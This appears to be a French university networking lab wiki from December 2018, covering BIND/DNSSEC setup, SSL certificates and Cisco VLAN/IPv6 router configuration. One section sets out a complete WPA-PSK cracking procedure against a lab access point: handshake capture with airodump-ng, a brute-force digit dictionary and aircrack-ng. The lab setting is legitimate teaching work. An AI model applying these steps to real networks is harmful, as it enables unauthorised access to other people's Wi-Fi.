  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
